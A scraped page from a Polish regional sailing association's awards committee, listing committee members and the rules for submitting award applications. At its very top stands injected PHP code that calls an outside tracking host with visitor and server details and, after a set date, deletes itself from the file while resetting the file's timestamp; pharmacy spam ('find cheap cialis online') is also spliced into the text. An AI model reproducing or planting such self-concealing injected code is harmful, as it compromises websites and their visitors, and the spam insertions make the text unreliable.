check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456727466){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=17&id=18776693&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_content/helpers/helpers.php"); } Komisja Odznaczeń

Witamy na stronie
Wielkopolskiego Okręgowego Związku Żeglarskiego !!!

Home Komisja Odznaczeń


Wszyscy Odznaczeni Honorową Odznaką "Za Zasługi dla Żeglarstwa Wielkopolskiego"
[ .pdf ] 

Odznaczeni medalem za find cheap cialis online wybitne zasługi dla żeglarstwa  [ .pdf ]   

Honorowi Członkowie Wielkopolskiego Okręgowego Związku Żeglarskiego    [ .pdf ] 

 Regulamin Honorowej Odznaki WOZŻ
  (.doc)

Wniosek o nadanie Honorowej Odznaki WOZŻ (.doc)

Skład Komisji:
Zdzisław Rochowski - przewodniczący, tel. kom. 608 404 233
Emilia Ludwikowska - sekretarz, tel. kom. 606 974 142
Jerzy Stefaniak - członek, tel. kom. 605 696 549
Zenon Kolendowicz - członek, tel. dom. 61 - 813 25 50
 


 

Tryb przyznawania odznaczeń.

Wnioski o odznaczenia należy składać zgodnie z postanowieniami regulaminów odpowiednich odznaczeń zamieszczonych na stronie internetowej WOZŻ

Szczególnie należy przestrzegać spraw formalnych związanych z:
♦ terminami składania wniosków,
♦ stosowaniem określonych formularzy,
♦ uprawnień regulaminowych podmiotów do składania wniosków,
♦ właściwego umotywowania wniosków stwierdzającego rzeczywiste wybitne osiągnięcia
  organizacyjne i sportowe.

Wnioski o przyznanie odznaczeń nadawanych przez PZŻ należy składać za pośrednictwem Zarządu WOZŻ. Wysyłanie wniosków bezpośrednio do sources PZŻ jest bezcelowe, ponieważ PZŻ zwraca je z powrotem do WOZŻ do zaopiniowania.

Przy ocenie i opiniowaniu nadesłanych do WOZŻ wniosków Komisja Odznaczeń WOZŻ uwzględnia przede wszystkim aktywną działalność społeczną działaczy szczebla okręgowego i zawodników uzyskujących wybitne wyniki sportowe w Mistrzostwach Polski oraz w znaczących imprezach międzynarodowych. Udział w zawodach oraz rejsach turystyczno - rekreacyjnych bez wybitnych osiągnięć oraz działalność wykonywana odpłatnie (sędziowanie, szkolenie itp.) nie są oceniane jako wybitne zasługi dla żeglarstwa. Działalność wykonywana na rzecz klubu winna być oceniana i wyróżniana przez kluby dyplomami, odznakami honorowymi i innymi nagrodami klubowymi.

Przypomina się, że wręczanie medali, odznak, dyplomów itp. Odbywa się zgodnie z regulaminem w sposób uroczysty np. z okazji otwarcia i zamknięcia sezonu żeglarskiego, klubowych i innych imprez oraz uroczystości rocznicowych. Dlatego prosimy zgłaszać do Komisji Odznaczeń tego rodzaju okazje i to możliwie do końca poprzedzającego je roku kalendarzowego.

Zaznaczamy, że prawie wszystkie odznaczenia są limitowane okresami rocznymi i może dojść do sytuacji, w której wniosek chociażby formalnie i merytorycznie poprawny i zasługujący jak najbardziej na pozytywne rozpatrzenie, ale zbyt późno złożony, zostanie zrealizowany jeden rok później na skutek wyczerpania rocznego limitu.

 

 

Poznań Know How

Energa Sailing